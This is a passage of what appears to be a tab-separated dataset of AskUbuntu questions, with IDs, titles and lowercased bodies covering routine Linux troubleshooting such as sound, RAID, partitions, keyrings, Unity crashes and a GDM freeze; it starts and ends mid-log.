do_vfs_ioctl+0x81/0x410 [ < ffffffff81156d61 > ] sys_ioctl+0x81/0xa0 [ < ffffffff810131b2 > ] system_call_fastpath+0x16/0x1b code : 00 55 48 89 e5 48 83 ec 10 48 89 1c 24 4c 89 64 24 08 0f 1f 44 00 00 41 89 d4 48 89 f3 e8 3f 9b fe ff 41 83 fc 01 48 89 c6 75 19 < 48 > 2b 18 48 c1 e3 03 48 03 58 18 48 89 d8 4c 8b 64 24 08 48 8b rip [ < ffffffffa0339e6a > ] gfn_to_rmap+0x2a/0x80 [ kvm ] rsp < ffff88014ee4d828 > cr2 : 0000000000000000 -- - [ end trace 18481f74af4eef67 ] -- -
43557	why is there a size discrepancy when copying from hfs+ to ext4 ?	i 'm copying over a bunch of files from an hfs+ volume to my ext4 ubuntu file system . they 're all movie files . when i copy one over , it nearly always gets 4k larger . the copied file is exactly 4,096 bytes larger than the original . i 'm assuming this is because some metadata of some sort is being added , but what is it exactly ? also , out of 600 files , two of them did n't grow in size . they 're exactly the same . why would this be ?
43564	how to make byobu start with terminator by default ?	recently , i have been using byobu and i quite like it . however , i am more of a terminator user than gnome-terminal and i want to launch byobu inside terminator instead of gnome-terminal by default . how do i do that ? edit : what i want is click the byobu icon and open byobu inside terminator instead of gnome terminal .
43566	no sound without headphones	i ca n't seem to find anything on this problem , just a ton of stuff on the reverse problem . i ca n't seem to get any sound out of my internal laptop speakers or input from the internal microphone . however , sound out of the headphone jack works perfectly . upgraded to 11.04 . other specs available if necessary .
43570	change owner of internal hard drive partition from root to user	i have a number of drives internal and external . some are partitioned . most mount automatically at boot ( all did at one point ) . one partition is owned by root and therefore does not mount automatically . i know how to mount it as root . i do not know how to take ownership of that partition as user x. i have tried changing permissions using the gui in nautilus as root . they are not accepted and immediately revert . the partition is ntfs . the other parition on that drive is owned by me as user and mounts automatically
43571	`` weird '' google chrome feature , huge address bar pops up	i am quite puzzled by this feature since it just seems off . when i press ctrl + } * and i 'm not in a text box . * ( basically the key below the + , left of enter ) i get this : a huge address bar where i can type ( in this case i had typed google.com - it 's not by default ) . the with enter it goes to that address . i does not have all the extra omnibar functionalities . i am very intrigued as to why this feature is there , it seems useless ( specially having ctrl + l ) , it does n't `` fit '' the design either . so if anyone has any ideas as to why that is there , i would like to hear it . thank in advance !
43576	is it safe to uninstall anacron ?	i have my desktop system running continually without shutdown and i want to get normal times ( 3:01 , 4:15 , 5:30 ) for cron . ( daily|weekly|monthly ) jobs but when anacron is installed these jobs run at around 7:30 and there is seems to be no interval between daily/weekly/monthly jobs . is it safe to just remove anacron ? what else could be affected by change from anacron to regular cron ?
43578	testing my raid array / is my mdadm raid working ok ?	this may just be me being very stupid but i do n't get it ! i am new to mdadm raid configuration and my system configuration is as follows : 1 * ata drive ( originally /dev/sda ) with ubuntu on it i then bought 2 * sata 2tb ( size is relevant ) drives which i want to mirror /dev/sdb & /dev/sdc i then ( using sdb & sdc only.. ) confirmed the existence hard disk devices using lshw -c disk partitioned them using fsdisk ( one large 2gb ext3 partition each ) ran : mdadm -- create /dev/md0 -- level=raid1 -- raid-devices=2 /dev/sdb1 /dev/sdc1 wait 7 hours for /proc/mdstat to say that the array is in active format the /dev/mb0 using ext3 partition run : mdadm -- examine -- scan > > /etc/mdadm/mdadm.conf mount it manually and when that worked add to /etc/fstab : /dev/md0 /var/samba_share/raid/ ext3 reboot and it mounts correctly - so everyone seems happy but my questions : i then powered down the system - unplugged one of the drives and started it up again . the system refused to boot complaining about the fact that it could not mount /dev/md0 . why ? this is a raid array and surely it should have happely booted from the remaining drive ( if i plug it in again - we are off and running - if i do n't i ca n't mount /dev/md0 myself either ) at some stage - ubuntu has decided to rename my drives any my original ata drive is now /dev/sdc whilst the new drives are /dev/sda and /dev/sdb - it does n't seem to break anything but it confuses me greatly ... . if ( 1 ) is normal behaviour - how would i recover from it if this was for real ? i prefer not to try the -- remove -- add route just for fun as with these drives it takes 7 hours to sync thanks for any advice ! -- clarification on giles 's comments : '' you should use filesystem uuids , filesystem labels or lvm labels and never /dev/sd* to designate drives . '' -- does that mean i did something wrong ? /boot/grub/grub.cfg ( that 's a large file so i extracted the bit which i thought may be relevant - please let me know if you need more : menuentry `` memory test ( memtest86+ ) '' { insmod ext2 set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set 41e1c8ad-df5e-4c49-b253-0831cc0a6ec8 linux16 /memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod ext2 set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set 41e1c8ad-df5e-4c49-b253-0831cc0a6ec8 linux16 /memtest86+.bin console=ttys0,115200n8 } /etc/fstab proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/mediaserver-root / ext4 errors=remount-ro 0 1 uuid=41e1c8ad-df5e-4c49-b253-0831cc0a6ec8 /boot ext2 defaults 0 2 /dev/mapper/mediaserver-swap_1 none swap sw 0 0 /dev/md0 /var/samba_share/raid/ ext3 mdadm -d /dev/md [ 0-9 ] * /dev/md0 : version : 00.90 creation time : tue may 17 14:51:40 2011 raid level : raid1 array size : 1953511936 ( 1863.01 gib 2000.40 gb ) used dev size : 1953511936 ( 1863.01 gib 2000.40 gb ) raid devices : 2 total devices : 2 preferred minor : 0 persistence : superblock is persistent update time : tue may 17 23:30:33 2011 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 uuid : cf48dce3 : ad034531:1fe5419e : fb5a4d56 ( local to host mediaserver.debeer.net ) events : 0.34 number major minor raiddevice state 0 8 17 0 active sync /dev/sdb1 1 8 33 1 active sync /dev/sdc1
43581	how to list packages from a ppa/source in command line ?	i want to list all the files from a source , say extras.ubuntu.com from the command line . what is the command for that ? dpkg -- list lists all files or just the filename .
43584	how to reset main user account ?	my main account got messed up , as i tried to fix it things went downhills . keyboard mess - tried unity -- restore and deleting .gconf2* , fail deleted . * in ~ , total havoc . chromium and firefox crashes etc . now , another user account is fully functioning , but i really want my regular username back . is there any way to completely wipe the settings for the messed up account or copy the profile from the functioning user ?
43585	why wo n't my setup see the partitions on my hard drive ?	i currently have a dual boot system with 6 partitions on my 180gb hard disk ( 4 ntfs , 1 for swap and the other one ext4 ) . ive got windows 7 and ubuntu 11.04 ( upgraded from 10.10 ) installed . the 11.04 installation is messed up right now : missing dependencies/ 2 fglrx installs/ i have to manually mount every drive in order to use it/plymouth extremely messed up ... anyway i spent hours and hours fixing stuff or making them worse . i now prefer to do a clean natty install . the problem arose : the installer sees my hard drive as 180gb of unallocated space . it doesnt detect any partitions , any other oss and my only option is to format my whole drive , but i cant do that with all the important files and such . is there some way i can just format the current ubuntu partition and install natty there ? ( causing the installer to properly see windows partitions for dual boot of course ) ? heres a pic : update ! : i played around with parted in the terminal and tried to use its print command . heres what i got : error : /dev/sr0 : unrecognised disk label i dont really know if its useful or something , im just trying stuff . bump ? i have some more information . when using disk utikity from the livecd it does see my partitions ! ! ! : ooo but strangely enough it does see two more unallocated spaces : one of 43gb and ... i laugh every time i think of this ... . and another 18 milion terrabites of unallocated space . clearly my hdd is messed up so i decided to delete at least one partition that i do not plan on using . ( i thought maybe that a change in the physical drive will update the partition table or something ) another problem : that did not work and it gave me the following error : `` cant have overlapping partitions . '' i googled this and it looks like a very bad thing ... . like i might have to completely reformat my drive ... and i most certainly do not want that ... output of 1st command : 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.000157283 s , 3.3 mb/s output of 2nd command mbr.bin : x86 boot sector ; partition 1 : id=0x7 , active , starthead 1 , startsector 63 , 69609582 sectors ; partition 2 : id=0xf , starthead 254 , startsector 69609769 , 321091031 sectors ; partition 3 : id=0x7 , starthead 254 , startsector 235577160 , 71601705 sectors , code offset 0x63 , oem-id `` đź '' , bytes/sector 190 , sectors/cluster 124 , reserved sectors 191 , fats 6 , root entries 185 , sectors 64514 ( volumes < =32 mb ) , media descriptor 0xf3 , sectors/fat 20644 , heads 6 , hidden sectors 309755 , sectors 2147991229 ( volumes > 32 mb ) , physical drive 0x7e , dos < 4.0 bootsector ( 0x0 ) the fdisk -l command wont do anything , i suppose it needs some parameters . yes i cand boot into the other two oss fine , i did try a check disk , and it did not solve anything . edit : stupid me , i didnt use sudo . here are the results from sudo fdisk -l : ubuntu @ ubuntu : ~ $ sudo fdisk -l omitting empty partition ( 5 ) disk /dev/sda : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00220022 device boot start end blocks id system /dev/sda1 * 1 4333 34804791 7 hpfs/ntfs /dev/sda2 4334 24320 160545515+ f w95 ext 'd ( lba ) /dev/sda3 14665 19121 35800852+ 7 hpfs/ntfs /dev/sda5 4334 13516 73755828+ 7 hpfs/ntfs /dev/sda6 13516 14608 8775680 83 linux /dev/sda7 14608 14663 442368 82 linux swap / solaris /dev/sda8 19122 24320 41760936 7 hpfs/ntfs ok i found something raid related and i executed this command : sudo dmraid -e -r /dev/sda just to get this output : `` no raid disks and with names : `` /dev/sda '' ''
43587	nautilus `` open in remote teminal '' fails after login	i have installed open-in-erminal package and now i have `` open in terminal '' and `` open in remote terminal '' in right click menu in nautilus . first one works perfect , but remote does not . it opens terminal , prompts for password , and after i type in a correct password , it terminal just dissapears . any idea ?
43588	why do i get an ibus warning with gedit	when i run gedit as the default user , i get the warning message show below . i do n't get the message when it is run by another user , nor when started via 'gksu ' , nor when running in a vm . i have set up ibus the same in all environments ( as far as i can tell ) ... . ( gedit:28053 ) : ibus-warning ** : connect to unix : abstract=/tmp/dbus-u43rnhcqth , guid=112b21bfd200d3fff7d683984dd22426 failed : failed to connect to socket /tmp/dbus-u43rnhcqth : connection refused . i 've disabled all the plugins ... i realize it is a `` warning '' , but warnings are issued for just that : a warning ... but i do n't understand what i am being warned about.. is it saying , `` warning . beware of the man-eating crocodiles ! `` , or is it saying , `` warning , it may rain tomorrow . '' .. i want to get rid of the cause of this message , if possible , or at least understand it . i am using lucid desktop 32bit
43593	symbolic links vs hard links	i just read the manpage for symlinks , but i still dont get it ... so hardlinks are pointers to the file/dir . then symlink is a pointer to a pointer ? whats the use of a symlink then ? why/when should i use one over the other ?
43602	how to start different desktop environments ?	suppose i have ubuntu desktop and installed xubuntu desktop and want to try it , how do i start it ? is it any different if i want to try lxde ? i reverted my virtual box to when i dont have a gui then tried startx but i got something like command not found or something ( ca n't remember )
43603	empathy silently disconnects ?	i 'm using empathy to connect to msn and after using it for about 15 minutes or so it seems to disconnect without letting me know . i can send messages to people and it will appear to have worked but it does n't . the only way around it is to go offline then go back online as far as i can tell . i know i 'm being disconnected/it stops working because people are trying to send me messages and i 'm not getting them until i log back in and messages i send do n't get through . why does it silently disconnect and is there any way i can get it to not do that ? i 'm using it over a wireless connection but i 've previously used windows live messenger on the same computer on windows without any issues so i do n't think it 's an issue with my connection . i really like empathy so would prefer not to have to switch clients .
43614	unity is completely theme less with nautilus ?	after installing gnome3-shell unity is completely theme less ( icon , nautilus , windows manager , panel ) and after several gnome updates gnome is also theme less ( icon , nautilus only ) .. help me to restore theme to unity and gnome 3 ... terminal : ~ $ gnome-settings-daemon ** ( gnome-settings-daemon:3881 ) : warning ** : ignoring unknown module 'org.gnome.settings-daemon.plugins.gconf ' [ 1305719379,000 , xklavier.c : xkl_engine_start_listen/ ] the backend does not require manual layout management - but it is provided by the application `menu_proxy_module_load ' : gnome-settings-daemon : undefined symbol : menu_proxy_module_load ( gnome-settings-daemon:3881 ) : gtk-warning ** : failed to load type module : ( null ) segmentation fault but sudo gnome-settings-daemon enable the theme in gnome3 but disable tapping in synaptics device
43619	unity ( and its window decorator ) keeps crashing , especially when using maximised windows	i 'm not sure why , but unity crashes fairly often ( roughly every 15-20 minutes ) . i get various bugs , for example when i try to click on the top panel , it simply becomes transparent . the same thing often happens with the launcher on right . as a somewhat separate ( however related ) note , very often , the window decorator crashes and does n't restart automatically . as a workaround i have a shortcut on my desktop to unity -- replace , although this restart does n't often last very long . running unity -- reset also does n't seem to help me much . it gets especially unbearable ( crashes far too often ) when running certain heavier applications such as google chrome and netbeans , full screen . does anyone have any suggested fixes ? or perhaps this has been discussed elsewhere , such as on launchpad ?
43621	what if i accidently run command `` chmod - r '' on system directories ( / , /etc , ... )	i accidently ran sudo chmod 755 -r / instead of sudo chmod 755 -r ./ i stopped it after few seconds , but now there is some problems such as sudo : must be setuid root how can i revert permissions back ?
43623	how to make ubuntu to remember the login keying password	i want my system to remember the keyring password of my chat account login as well as broadcast account . many times i clicked on remember this keyring password but it not working fine ; i mean whenever i boot up computer it prompts for keyring password . is n't any way to system to remember the keyring password ; or to tell system not to ask keyring password until application is loaded i mean started .
43624	how can i show workspace names in unity ?	i have found that the number of workspaces is read from metacitys configuration which also has workspace names . i want to show them .
43625	shell script to install software & configure network	hey , i wanted to know , how to , after a fresh install of ubuntu , i can install all essential softwares ( vlc , apache , mysql , php , java , netbeansetc ) using a shell script . also i wanted that same shell script to configure my static network ip including address , gateway , netmask & dns server ip for ipv4 ... possible ? not impossible , right ?
43628	no sound with intel 82801i audio	i have no sound at all on my 10.04 system . i have tried to follow https : //help.ubuntu.com/community/soundtroubleshooting with no luck so far . the odd thing is that sound worked before i upgraded to 10.04. aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc268 analog [ alc268 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 http : //www.alsa-project.org/db/ ? f=11fbe1d77bbaa67122f3f3ed673f8d992d09c2a8 lspci shows 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) i tried this too but with no luck : sudo aptitude -- purge reinstall linux-sound-base alsa-base alsa-utils linux-image-`uname -r` linux-ubuntu-modules-`uname -r` libasound2 i am mystified .
43629	multi screen external monitor unrecognized	i have the ati graphics manager ( catalyst control center ) configured for my external monitor , attached to my toshiba laptop , and the external monitor is recognized by this utility . however , the monitor shows up as `` unknown '' in the ubuntu > monitor > preferences , and the monitor itself shows the message `` no signal '' . the laptop is dual boot , with windows vista , and i have the same problem with the monitor signal if i try it in vista . however it was all working fine only days ago in vista . the same external monitor works fine on an ancient dell , and is recognized in monitor > preferences , so i know it is not a problem with the monitor or the cables . i see that there is a file xorg.conf ( /etc/x11/ ) that seems to hold all the right info regarding the ati graphics card , and another xorg.conf ( in /usr/share/doc/xserver-xorg-video-nouveau/examples ) , which has minimal info . do i need to be editing these ? any ideas ?
43633	how to install and run greedy car thieves ?	i heard about the game `` greedy car thieves '' which is inspired by `` gta2 '' . how to install it ? i 'd also like to have the game on my launcher .
43635	increase edge binding delay ?	is it possible to increase the delay on the edge bindings in ccsm ? i would like to have the activity journal launch if i hold my mouse in the lower right corner , but i find myself accidently launching it all the time if i just pass by the corner .
43639	possible to preview what will rsync do , before overwriting/deleting files ?	with synctoy on windows , i can preview what it will do to my files before commiting the changes . is it possible to do the same with rsync or something similar ?
43640	choose password for new keyring	i 'm using ubuntu 11.04 , after login it displays this message : choose password for new keyring an application wants to create a new keyring called 'default ' . choose password you want to use for it . system is just hanged ... not able to do anything . [ except the terminal login using ( alt+ctr+f1 ) ] . what is the keyring is all about ? how to get rid of it ? i 'm stuck here . i have removed the file keyring file @ home/.gnome2/keyring ... still the issue remains . could you please tell me command based solution ... [ i tried with seahorse , however `` terminal can not open display '' ] and i dont want to restart the system .
43643	how can i export all the mp3s from a playlist in banshee ?	i have all my music , unsorted in /home/blah/music/ . it 's in random folders , which does n't matter for me though since banshee takes care of everything . i have a large playlist containing a good 2/3 of my music . how can i copy all the mp3 files listed in the playlist into a new folder ? note : i am not trying to export a playlist , but copy the mp3s listed in the playlist .
43644	ca n't log in to samba pdc with domain account	i have a problem . i like to login on a samba server with my ubuntu 10.04/11.04 pc . on my samba server there are some accounts with data , but i could n't connect to it . i have done this : aptitude -y install winbind smbclient mv /etc/samba/smb.conf /etc/samba/smb.conf.original vim /etc/samba/smb.conf contents of the file : [ global ] workgroup = lan idmap uid = 10000-20000 idmap gid = 10000-20000 template shell = /bin/bash template homedir = /home/ % d/ % u winbind enum users = yes winbind enum groups = yes winbind cache time = 10 winbind separator = + winbind use default domain = yes security = domain password server = * encrypt passwords = yes domain master = no local master = no preferred master = no os level = 0 then i have done this : /etc/init.d/winbind restart net rpc join -s 192.168.0.253 -u administrator wbinfo -u //no result vim /etc/nsswitch.conf i wrote into the file nsswitch.conf : passwd : compat winbind group : compat winbind shadow : compat after that i did this : /etc/init.d/winbind restart vim /etc/security/group.conf i edited the file group.conf : * ; * ; * ; al0000-2400 ; floppy , audio , cdrom , video , usb , plugdev , users vim /etc/pam.d/common-auth auth required pam_group.so use_first_pass auth sufficient pam_winbind.so auth sufficient pam_unix.so nullok_secure use_first_pass auth required pam_deny.so vim /etc/pam.d/sudo auth sufficient pam_winbind.so auth sufficient pam_unix.so use_first_pass auth required pam_deny.so @ include common-account and after i have done all this , i get the error message : `` no logon server '' , when i try to login with my account from the samba server . but if i try to login with my local account i get the same message but it works .
43649	plugging two external screens to laptop via vga and hdmi	i have an asus u30jc laptop with a vga and hdmi ports . i can connect my external screen ( 1920x1200 ) to either of those ports but i wonder if i would be able to use two screens at the same time , one plugged to the vga and the other to the hdmi socket . any ideas ? where should i find out ? doing xrandr , i get : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 164mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) when connected to the vga external screen , i get : xrandr screen 0 : minimum 320 x 200 , current 3286 x 1200 , maximum 8192 x 8192 lvds1 connected 1366x768+1920+432 ( normal left inverted right x axis y axis ) 293mm x 164mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 1280x1024 60.0 1280x960 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 60.0 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis )
43650	how to install kde 4.3 on ubuntu 9.04 ? ( or how can i use konqueror 4.3 on andlinux ? )	i added the kubuntu jaunty backport deb in the sources.list file , the gpg key + done apt-get update and dist-upgrade etcâś pick a question : is there a way to update konqueror 4.2.4 ? where can i find the source of konqueror 4.3 and how to build it ? how to download this git rev ? where can i find 4:4.3.1-0ubuntu1~jaunty1~ppa ?
43651	how can i run the bitcoin client on natty ?	the ppa : stretch/bitcoin-ppa does n't have any packages , as i can see , and when i download the tar.gz from sourceforge that ( the official client ) it just wont start . is there any dependencies i 've missed , or what ?
43652	image slideshow application ?	i want to show my images , is there any good application for image slideshow that has many transition effects ?
43653	update and log-in hazzles	i am totally new at ubuntu and have the 11.4 version on my laptop after getting fed up with windows . i cant download updates using update manager - i get the bug # 783594 ) and see the following comment : * security update : denial of service via long apt url ( lp : # 783594 ) - check url for length and shorten it for error dialog in apturl/apturl.py , apturl/parser.py , tests/apturlparse.py . - patch thanks to micheal vogt - cve number pending i do n't know where to find the url , how to check it , nor how to shorten it to my second problem is that when i want to install software from the ubuntu software centre i either get a message `` install from safe site only '' or nothing at all . even when after clicking on the install button it says `` installing '' yet the software is not installed . thirdly my firefox wo n't log into face boob . can any help a frustrated beginner . best wishes from south africa uwe
43656	windows media center alternatives	hello , anyone know about windows media center alternative for ubuntu ? i want to play my all video , music and show my images with just one app .
43659	how can i edit the quicklists via gui ?	i want to make quicklists on my own . how do i do this from the gui ?
43660	why does file synchronization take so long ?	i have a folder with 15 files , each about 100kb and it more that 2 hours but progress is 0 % on all files . tried to restart , reconnect internet and so on . why is it ?
43664	how can i use a camcorder as webcam on usb mode ?	we have a sony handycam dcr-sx15 . we want to use the camcorder as a webcam to live stream with it . computer on ubuntu and other operation systems list it as a storage device . i searched on forums but topics are old and softwares are out of date . only usb cable option , no analog or firmware .
43665	skype - voice fine , but no notification sounds	i have skype installed via software center on clean copy of ubuntu 11.04 . skype package version is 2.2.0.25-1maverick1 . voice calls work perfectly fine both ways . but notification sounds do not work at all , which is weird since they use exactly the same audio device . on the screen below , if i click make a test call it works fine . if i click make a test sound i hear nothing at all . hardware is 2010 mbp 13 '' ( 7,1 ) with nvidia soundcard . 00:08.0 audio device : nvidia corporation mcp89 high definition audio ( rev a2 )
43668	how do i make a key on the keyboard do *nothing* ?	my right control key on my keyboard sticks . i hit it accidentally often enough that i 'd like to make it do absolutely nothing when it 's hit . is this possible ?
43669	auto copy files when added to network share	i have a network share on my system to which our plotter scanner sends its scanned files . how can i write a script to automatically copy newly added files to another folder ?
43682	how to install the latest version of groovy ?	i have already installed groovy in my ubuntu 10.10 desktop version . now the language have been released its latest version of groovy 1.8 . when i try to install using the same command that have been used to install the groovy previous version , such as : sudo apt-get install groovy i 'm getting error like , 0 upgraded , 0 newly installed , 0 to remove and 135 not upgraded . so how could i can install , i 'm a novice to ubuntu , so kindly help me .
43692	eucalyptus - instance is running but ca n't access it	i 've installed ubuntu enterprise cloud on a server and i 'm able to bring up an instance from a image and the instance shows that is running . i see the ips allocated to that instance but for some reason i ca n't access it via ssh . euca-describe-groups shows : group admin default default group permission admin default allows tcp 22 22 from cidr 0.0.0.0/0 i 'm on the same network as the instance so i 'm sure is not a networking problem since i 'm able to access the node controller server that is under the same network . any ides ?
43694	where can i find the fingerprint of 'bazaar.launchpad.net ' ?	i 'd like to verify the rsa key fingerprint i 'm shown , where would i find it online* ? please do n't post random pages showing that fingerprint , it should be an official one . * ) i know that 's not the best way to verify it , but it 's better than just blindly typing 'yes ' . ; - )
43701	how to go about trying to access files stored on mobile phone ( via usb ) ?	i 'd like to transfer files ( photos and audio mainly ) from my phone , to my ubuntu pc . unfortunately upon plugging it in ( through micro usb ) nothing is automatically mounted . if i insert a memory card into the phone , then that is automatically mounted . there is software i can run on windows xp that allows me to transfer files ( although it does not make the phone show up as a volume in windows explorer ) . the phone is a 3 skypephone s2 ( manufactured by amoi ) . everything i find on the internet suggests it should have a mass storage mode . when connnecting the phone to the computer a `` pc suite '' mode can be enabled , however this does not seem to make a difference . i tried to install the windows software through wine , however this did n't work . ( probably unsurprising that wine does n't help with hardware related problems . ) i looked at this page but was unable to get `` 1614:0407 '' , although i doubt that it would have helped if i had been able to . running udisks -- mount /dev/sr2 gives me a 'cd ' with some windows driver files . if i run sudo usb_modeswitch -- default-vendor 0x1614 -- default-product 0x1000 then this goes 'cd ' away , but i do not get access to the phone 's memory . below are the new entries in dmesg when the phone is connected . entering pc suite mode does not cause any more messages . [ 683.140030 ] usb 7-1 : new full-speed usb device number 2 using uhci_hcd [ 683.312734 ] scsi8 : usb-storage 7-1:1.0 [ 684.317071 ] scsi 8:0:0:0 : cd-rom s2 driver cdrom 2.31 pq : 0 ansi : 2 [ 684.331067 ] sr2 : scsi3-mmc drive : 0x/0x caddy [ 684.331241 ] sr 8:0:0:0 : attached scsi cd-rom sr2 [ 684.331799 ] sr 8:0:0:0 : attached scsi generic sg9 type 5 when plugging in , i get the following extra entries in /dev : lrwxrwxrwx 1 root root 3 feb 29 18:22 cdrom2 - > sr2 crw-rw -- -- + 1 root cdrom 21 , 9 feb 29 18:22 sg9 brw-rw -- -- + 1 root cdrom 11 , 2 feb 29 18:22 sr2 below is the output from lsusb : bus 007 device 003 : id 1614:1000 amoi electronics device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x1614 amoi electronics idproduct 0x1000 bcddevice 0.00 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk ( zip ) iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x05 ep 5 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 can not read device status , operation not permitted ( 1 )
43702	unity shortcuts for switching to the next/previous windows in group and the next/previous applications ?	what i miss from dockbarx is the possibility of adding keyboard shortcuts for switching to the next/previous windows in the group of windows for an application , and the next/previous applications . is there a way i could have this with unity ? perhaps unity already offers such features that i do not know about ? normal behavior ? also , i would like to preempt the suggestion that i simply shorten the default width of windows to accommodate the for the launcher . firstly , this defeats the purpose of having purchased a monitor this wide in the first place ; 1024 pixels is an important minimum width to meet because many popular websites are de
43704	gdm causes freeze on a remote login server . ( over 5,000 users )	i run an ubuntu ftp server in the company i work for , and we recently migrated over 5,000 customers to it . i created a jailed user / home folder for each customer and everything was running smoothly until one of the packages i installed required a system restart ... and then all hell broke loose . the gui now freezes on startup before the login screen . i am able to remote-ssh into the server via putty , and thus have tried hiding the users through the command : sudo gconftool-2 -- direct -- config-source xml : readwrite : /etc/gconf/gconf.xml.mandatory -- type boolean -- set /apps/gdm/simple-greeter/disable_user_list true then restarted the server again , but to no avail . we are now 2 days behind with customer records , and i am in dire need of help ! my life ( and job ) depend on a solution to this serious issue ... p.s . -- i have already thought about just booting up into bash , however my boss tells me that i need to have the gui available in the event that he wants to go into the server to make any changes manually , so sadly a bash-boot is not an option . additional information : from : cat /var/log/apt/history.log start-date : 2011-05-16 15:51:35 install : sysinfo ( 0.7-3ubuntu1 ) end-date : 2011-05-16 15:51:41 start-date : 2011-05-16 15:52:20 remove : sysinfo ( 0.7-3ubuntu1 ) end-date : 2011-05-16 15:52:22 start-date : 2011-05-18 07:51:42 upgrade : apturl-common ( 0.4.1ubuntu4 , 0.4.1ubuntu4.1 ) , apturl ( 0.4.1ubuntu4 , 0.4.1ubuntu4.1 ) end-date : 2011-05-18 07:51:53 start-date : 2011-05-18 10:19:47 install : linux-headers-2.6.32-31 ( 2.6.32-31.61 ) , linux-headers-2.6.32-31-generic ( 2.6.32-31.61 ) , linux-image-2.6.32-31-generic ( 2.6.32-31.61 ) upgrade : linux-headers-generic ( 2.6.32.30.36 , 2.6.32.31.37 ) , eclipse-rcp ( 3.5.2-2ubuntu4.2 , 3.5.2-2ubuntu4.3 ) , linux-image-generic ( 2.6.32.30.36 , 2.6.32.31.37 ) , apt-transport-https ( 0.7.25.3ubuntu9.3 , 0.7.25.3ubuntu9.4 ) , eclipse-platform-data ( 3.5.2-2ubuntu4.2 , 3.5.2-2ubuntu4.3 ) , apt-utils ( 0.7.25.3ubuntu9.3 , 0.7.25.3ubuntu9.4 ) , apt ( 0.7.25.3ubuntu9.3 , 0.7.25.3ubuntu9.4 ) , libequinox-osgi-java ( 3.5.2-2ubuntu4.2 , 3.5.2-2ubuntu4.3 ) , gdm ( 2.30.2.is.2.30.0-0ubuntu5.1 , 2.30.2.is.2.30.0-0ubuntu5.2 ) , xdg-utils ( 1.0.2-6.1ubuntu3 , 1.0.2-6.1ubuntu3.1 ) , eclipse-platform ( 3.5.2-2ubuntu4.2 , 3.5.2-2ubuntu4.3 ) , linux-generic ( 2.6.32.30.36 , 2.6.32.31.37 ) os type : linux ftp 2.6.32-31-generic # 61-ubuntu smp fri apr 8 18:24:35 utc 2011 i686 gnu/linux strange error : buffer i/o error on device sdb , logical block 96 ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata4.00 : bmdma stat 0x25 ata4.00 : failed comand : read dma ata4.00 : cmd c8/00:08:00:03:00/00:00:00:00:00/e0 tag 0 dma 4096 in res 51/40:08:08:03:00/00:00:00:00:00/e0 emask 0x9 ( media error ) ata4.00 : status : { drdy err } ata4.00 : error : { unc } ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata4.00 : bmdma stat 0x25 ata4.00 : failed comand : read dma ata4.00 : cmd c8/00:08:00:03:00/00:00:00:00:00/e0 tag 0 dma 4096 in res 51/40:08:08:03:00/00:00:00:00:00/e0 emask 0x9 ( media error ) ata4.00 : status : { drdy err } ata4.00 : error : { unc } ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata4.00 : bmdma stat 0x25 ata4.00 : failed comand : read dma ata4.00 : cmd c8/00:08:00:03:00/00:00:00:00:00/e0 tag 0 dma 4096 in res 51/40:08:08:03:00/00:00:00:00:00/e0 emask 0x9 ( media error ) ata4.00 : status : { drdy err } ata4.00 : error : { unc } ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata4.00 : bmdma stat 0x25 ata4.00 : failed comand : read dma ata4.00 : cmd c8/00:08:00:03:00/00:00:00:00:00/e0 tag 0 dma 4096 in res 51/40:08:08:03:00/00:00:00:00:00/e0 emask 0x9 ( media error ) ata4.00 : status : { drdy err } ata4.00 : error : { unc } ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata4.00 : bmdma stat 0x25 ata4.00 : failed comand : read dma ata4.00 : cmd c8/00:08:00:03:00/00:00:00:00:00/e0 tag 0 dma 4096 in res 